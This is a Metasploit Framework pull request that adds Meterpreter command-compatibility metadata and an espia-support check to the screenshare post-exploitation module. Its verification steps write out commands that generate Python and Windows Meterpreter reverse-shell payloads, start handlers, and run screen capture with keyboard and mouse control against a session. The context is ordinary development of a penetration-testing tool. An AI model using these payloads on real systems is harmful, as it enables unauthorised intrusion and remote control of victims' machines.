### PR TITLE
Add meterpreter compatibility metadata to screenshare module

### DIFF
--- a/lib/msf/core/exploit/file_dropper.rb
+++ b/lib/msf/core/exploit/file_dropper.rb
@@ -4,18 +4,21 @@ module Msf
 module Exploit::FileDropper
 
   def initialize(info = {})
-    super(update_info(info,
-      'Compat' => {
-        'Meterpreter' => {
-          'Commands' => %w[
-            stdapi_fs_delete_dir
-            stdapi_fs_delete_file
-            stdapi_fs_getwd
-            stdapi_fs_stat
-          ]
+    super(
+      update_info(
+        info,
+        'Compat' => {
+          'Meterpreter' => {
+            'Commands' => %w[
+              stdapi_fs_delete_dir
+              stdapi_fs_delete_file
+              stdapi_fs_getwd
+              stdapi_fs_stat
+            ]
+          }
         }
-      }
-    ))
+      )
+    )
 
     self.needs_cleanup = true
     @dropped_files = []

--- a/lib/msf/core/post_mixin.rb
+++ b/lib/msf/core/post_mixin.rb
@@ -50,8 +50,11 @@ module Msf::PostMixin
     check_for_session_readiness if session.type == "meterpreter"
 
     incompatibility_reasons = session_incompatibility_reasons(session)
-    unless incompatibility_reasons.empty?
-      print_warning("SESSION may not be compatible with this module (#{incompatibility_reasons.join('. ')})")
+    if incompatibility_reasons.any?
+      print_warning("SESSION may not be compatible with this module:")
+      incompatibility_reasons.each do |reason|
+        print_warning(" * #{reason}")
+      end
     end
 
     # Msf::Exploit#setup for exploits, NoMethodError for post modules

--- a/modules/post/multi/manage/screenshare.rb
+++ b/modules/post/multi/manage/screenshare.rb
@@ -21,7 +21,17 @@ class MetasploitModule < Msf::Post
         'Author' => [ 'timwr'],
         'Platform' => [ 'linux', 'win', 'osx' ],
         'SessionTypes' => [ 'meterpreter' ],
-        'DefaultOptions' => { 'SRVHOST' => '127.0.0.1' }
+        'DefaultOptions' => { 'SRVHOST' => '127.0.0.1' },
+        'Compat' => {
+          'Meterpreter' => {
+            'Commands' => %w[
+              espia_image_get_dev_screen
+              stdapi_ui_desktop_screenshot
+              stdapi_ui_send_keyevent
+              stdapi_ui_send_mouse
+            ]
+          }
+        }
       )
     )
   end

--- a/modules/post/multi/manage/screenshare.rb
+++ b/modules/post/multi/manage/screenshare.rb
@@ -25,12 +25,16 @@ class MetasploitModule < Msf::Post
         'Compat' => {
           'Meterpreter' => {
             'Commands' => %w[
-              espia_image_get_dev_screen
               stdapi_ui_desktop_screenshot
               stdapi_ui_send_keyevent
               stdapi_ui_send_mouse
             ]
           }
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
         }
       )
     )
@@ -56,12 +60,20 @@ class MetasploitModule < Msf::Post
     end
   end
 
+  def supports_espia?(session)
+    return false unless session.platform == 'windows'
+
+    session.core.use('espia') unless session.espia
+    session.espia.present?
+  rescue RuntimeError
+    false
+  end
+
   # rubocop:disable Metrics/MethodLength
   def on_request_uri(cli, request)
     if request.uri =~ %r{/screenshot$}
       data = ''
-      if session.platform == 'windows'
-        session.console.run_single('load espia') unless session.espia
+      if supports_espia?(session)
         data = session.espia.espia_image_get_dev_screen
       else
         data = session.ui.screenshot(50)


### PR DESCRIPTION
Building on the work of https://github.com/rapid7/metasploit-framework/pull/15295 and https://github.com/rapid7/metasploit-framework/pull/15659

## Verification

1) Get a Python shell:
```
use payload/python/meterpreter_reverse_tcp
set LHOST 192.168.123.1
generate -o shell.py -f raw
to_handler
```

Verify validation works as expected:
```
use multi/manage/screenshare
run session=-1
```

Expected output:
> [!] SESSION may not be compatible with this module (missing Meterpreter features: stdapi_ui_desktop_screenshot, stdapi_ui_send_keyevent, stdapi_ui_send_mouse, espia_image_get_dev_screen)
> [*] Using URL: http://127.0.0.1:8080/aKK5njyTRRh
> [*] Server started.

2) Get a windows shell:
```
use windows/meterpreter/reverse_https
set LHOST 192.168.123.1
set LPORT 4444
set SessionCommunicationTimeout 0
set ExitOnSession false

# Create the executable tun on on the VM
generate -o reverse.exe -f exe

# Create listener
to_handler
```

Verify validation works as expected:
```
use multi/manage/screenshare
run session=-1
```

Expected output: